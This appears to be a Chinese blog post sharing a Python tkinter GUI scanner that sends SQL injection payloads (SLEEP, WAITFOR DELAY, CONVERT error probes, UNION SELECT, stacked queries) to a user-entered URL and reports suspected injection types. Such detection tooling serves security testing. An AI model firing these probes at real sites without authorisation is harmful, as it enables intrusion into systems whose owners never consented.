这是一个SQL注入漏洞检测工具,使用了Python的tkinter库创建了一个图形化界面。用户在界面中输入目标URL,然后点击"开始扫描"按钮来检测是否存在SQL注入漏洞。
定义了几个函数来检测不同类型的SQL注入漏洞,包括布尔盲注、时间盲注、报错注入、UNION联合查询注入和堆叠注入。这些函数向目标URL发送特定的payload,并根据响应结果判断是否存在漏洞。
检测过程通过创建一个ScanThread线程来执行,这样可以避免阻塞主界面。在线程中,依次调用各个漏洞检测函数,并将检测结果保存到vulnerabilities列表中。同时,更新进度条的值以显示检测进度。
检测完成后,停止进度条的动画,重新启用"开始扫描"按钮,并通过messagebox弹窗展示检测结果。如果未发现SQL注入漏洞,则弹窗显示"未发现SQL注入漏洞";如果存在漏洞,则弹窗显示具体的漏洞类型。
整个程序的界面由两个部分组成:URL输入框,以及放在同一行的"开始扫描"按钮和进度条。用户在URL输入框中输入目标URL,然后点击"开始扫描"按钮来触发漏洞检测。进度条会显示检测的进度。
代码:
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
import requests
import threading
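# Blind-injection probe (reported under the "boolean blind" label)
def check_boolean_blind_injection(url):
    """Send one delay probe and report whether the response was delayed.

    Args:
        url: Base URL; the payload is appended to it as an extra path segment.

    Returns:
        "存在布尔盲注漏洞" when the probe response took at least 5 seconds
        while the unmodified URL answered faster, otherwise "".

    Raises:
        requests.RequestException: on connection failure or timeout. It is
            not swallowed here, because returning "" for a failed request
            would read as "no vulnerability found".
    """
    # NOTE(review): this is a time-delay probe (MySQL SLEEP), not a boolean
    # true/false response comparison, so the reported label is misleading.
    payload = "1' AND SLEEP(5) -- -"
    test_url = f"{url}/{payload}"
    # Bounded wait: without a timeout an unresponsive host blocks the scan
    # thread forever and the UI never re-enables the button.
    timeout_seconds = 30

    # Measure the endpoint without a payload first. If it is already this
    # slow, a slow probe proves nothing; the result is inconclusive, which
    # the string-only return value can only express as "".
    baseline = requests.get(url, timeout=timeout_seconds)
    if baseline.elapsed.total_seconds() >= 5:
        return ""

    response = requests.get(test_url, timeout=timeout_seconds)
    if response.elapsed.total_seconds() >= 5:
        return "存在布尔盲注漏洞"
    return ""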
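# Time-based blind injection probe
def check_time_blind_injection(url):
    """Send one delay probe and report whether the response was delayed.

    Args:
        url: Base URL; the payload is appended to it as an extra path segment.

    Returns:
        "存在时间盲注漏洞" when the probe response took at least 5 seconds
        while the unmodified URL answered faster, otherwise "".

    Raises:
        requests.RequestException: on connection failure or timeout. It is
            not swallowed here, because returning "" for a failed request
            would read as "no vulnerability found".
    """
    # The payload uses SQL Server syntax (sysobjects, WAITFOR DELAY); other
    # database engines will not react to it, so "" does not mean "safe".
    payload = "1' AND (SELECT COUNT(*) FROM sysobjects WHERE xtype = 'U') > 0; WAITFOR DELAY '0:0:5' -- -"
    test_url = f"{url}/{payload}"
    # Bounded wait: without a timeout an unresponsive host blocks the scan
    # thread forever.
    timeout_seconds = 30

    # A single slow response is not evidence on its own: compare against the
    # endpoint's normal latency to avoid flagging servers that are just slow.
    baseline = requests.get(url, timeout=timeout_seconds)
    if baseline.elapsed.total_seconds() >= 5:
        return ""

    response = requests.get(test_url, timeout=timeout_seconds)
    if response.elapsed.total_seconds() >= 5:
        return "存在时间盲注漏洞"
    return ""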
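# Error-based injection probe
def check_error_based_injection(url):
    """Send one type-conversion probe and look for a database error message.

    Args:
        url: Base URL; the payload is appended to it as an extra path segment.

    Returns:
        "存在报错注入漏洞" when the response body contains the text
        "Conversion failed", otherwise "".

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    payload = "1' AND (SELECT CONVERT(INT, CHAR(65))) -- -"
    test_url = f"{url}/{payload}"
    # Bounded wait so a stalled connection cannot hang the scan thread.
    response = requests.get(test_url, timeout=30)
    # NOTE(review): the oracle is one English SQL Server error string. A site
    # that hides error details, or runs another database engine, yields ""
    # even if it is injectable - treat "" as "not detected", not as "safe".
    if "Conversion failed" in response.text:
        return "存在报错注入漏洞"
    return ""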
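# UNION-query injection probe
def check_union_based_injection(url):
    """Send one UNION probe and look for its marker in the response body.

    Args:
        url: Base URL; the payload is appended to it as an extra path segment.

    Returns:
        "存在UNION联合查询注入漏洞" when the response body contains "1,2,3",
        otherwise "".

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    payload = "1' UNION SELECT 1,2,3 -- -"
    test_url = f"{url}/{payload}"
    # Bounded wait so a stalled connection cannot hang the scan thread.
    response = requests.get(test_url, timeout=30)
    # NOTE(review): weak oracle. Any page that echoes the requested path
    # (a 404 page, a search box, a log view) also contains "1,2,3", and a
    # real three-column result is rarely rendered as that literal string.
    # A positive here needs manual confirmation.
    if "1,2,3" in response.text:
        return "存在UNION联合查询注入漏洞"
    return ""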
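# Stacked-query injection probe
def check_stack_based_injection(url):
    """Send one non-destructive stacked statement and report a delayed reply.

    A detection probe must never modify the target's data, so the stacked
    statement is a delay rather than any DDL/DML such as DROP TABLE. The
    delay also gives a usable oracle: checking that the word "users" is
    absent from an unrelated response is true for almost every page and
    therefore reports a vulnerability on nearly any target.

    Args:
        url: Base URL; the payload is appended to it as an extra path segment.

    Returns:
        "存在堆叠注入漏洞" when the probe response took at least 5 seconds
        while the unmodified URL answered faster, otherwise "".

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    # Same delay statement the time-based check in this file uses
    # (SQL Server syntax); it runs only if a second statement is accepted.
    payload = "1'; WAITFOR DELAY '0:0:5' -- -"
    test_url = f"{url}/{payload}"
    # Bounded wait so a stalled connection cannot hang the scan thread.
    timeout_seconds = 30

    # Compare against normal latency so a slow server is not reported as
    # vulnerable; an already-slow endpoint is inconclusive and returns "".
    baseline = requests.get(url, timeout=timeout_seconds)
    if baseline.elapsed.total_seconds() >= 5:
        return ""

    response = requests.get(test_url, timeout=timeout_seconds)
    if response.elapsed.total_seconds() >= 5:
        return "存在堆叠注入漏洞"
    return ""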
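# Background scan worker
class ScanThread(threading.Thread):
    """Run every injection check against one URL off the Tk main loop.

    Progress reflects how many checks have finished (not how many findings
    there are), a failing check is reported instead of killing the thread,
    and all widget access is queued onto the Tk event loop with after().
    """

    def __init__(self, url):
        # daemon=True: closing the window must not keep the process alive
        # while a request is still waiting for its timeout.
        threading.Thread.__init__(self, daemon=True)
        self.url = url

    def run(self):
        """Execute the checks in order, then hand the results to the UI."""
        checks = (
            check_boolean_blind_injection,
            check_time_blind_injection,
            check_error_based_injection,
            check_union_based_injection,
            check_stack_based_injection,
        )
        vulnerabilities = []
        failures = []
        for completed, check in enumerate(checks, start=1):
            try:
                finding = check(self.url)
            except Exception as exc:  # thread boundary: report, don't die
                # A failed request must not be shown as "nothing found".
                failures.append(f"{check.__name__}: 请求失败 ({exc})")
            else:
                if finding:
                    vulnerabilities.append(finding)
            self._set_progress(completed / len(checks) * 100)
        # Queue the final UI update; widgets are only touched by callbacks
        # that the Tk event loop runs.
        progress_bar.after(0, self._finish, vulnerabilities, failures)

    def _set_progress(self, value):
        """Queue a progress-bar update with the given percentage."""
        progress_bar.after(0, lambda: progress_bar.configure(value=value))

    def _finish(self, vulnerabilities, failures):
        """Restore the controls and show the scan outcome in a dialog."""
        progress_bar.stop()
        progress_bar["value"] = 100
        btn_detect.config(state=tk.NORMAL)
        if vulnerabilities:
            # Findings first; failed checks are listed so the user knows the
            # scan was incomplete.
            messagebox.showwarning("警告", "\n".join(vulnerabilities + failures))
        elif failures:
            messagebox.showerror("错误", "\n".join(failures))
        else:
            messagebox.showinfo("提示", "未发现SQL注入漏洞")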
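# Validate the URL and start a scan for all injection types
def detect_vulnerabilities():
    """Handle the scan button: validate the URL, lock the UI, start the worker.

    Shows an error dialog and returns without scanning when the entry is
    empty or is not an absolute http(s) URL.
    """
    from urllib.parse import urlparse

    url = entry_url.get().strip()
    if not url:
        messagebox.showerror("错误", "请输入URL")
        return
    # Reject anything that is not an absolute http(s) URL up front; otherwise
    # the request fails inside the worker thread and the button stays
    # disabled.
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        messagebox.showerror("错误", "请输入以 http:// 或 https:// 开头的完整URL")
        return
    # Disable the button while a scan is running and reset the progress bar.
    btn_detect.config(state=tk.DISABLED)
    progress_bar["value"] = 0
    progress_bar.start()
    # Run the checks on a worker thread so the window stays responsive.
    thread = ScanThread(url)
    thread.start()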
# Create the main window (title and fixed initial size).
window = tk.Tk()
window.title("SQL注入漏洞检测")
window.geometry("400x200")
# URL input: a label followed by the entry that detect_vulnerabilities reads.
label_url = tk.Label(window, text="URL:")
label_url.pack()
entry_url = tk.Entry(window, width=40)
entry_url.pack()
# Scan button and progress bar, packed side by side inside one frame.
frame_progress = tk.Frame(window)
frame_progress.pack(pady=10)
# The button's command starts the scan; ScanThread re-enables it when done.
btn_detect = tk.Button(frame_progress, text="开始扫描", command=detect_vulnerabilities)
btn_detect.pack(side=tk.LEFT)
progress_bar = ttk.Progressbar(frame_progress, mode="determinate", length=200)
progress_bar.pack(side=tk.LEFT, padx=10)
# Enter the Tk event loop; this call blocks until the window is closed.
window.mainloop()
运行截图如下:
输入目标网站的url后,点击“开始扫描”:
弹窗提示目标网站存在堆叠注入漏洞。该结论仅来自一次自动化检测,可能存在误报,需要人工复核后才能确认。
请注意,这段代码只是一个简单的示例,可以根据实际需要进行修改和扩展。在实际使用中,建议对目标URL进行合法性验证、异常处理等操作,以提高程序的健壮性和安全性。
与大家共勉。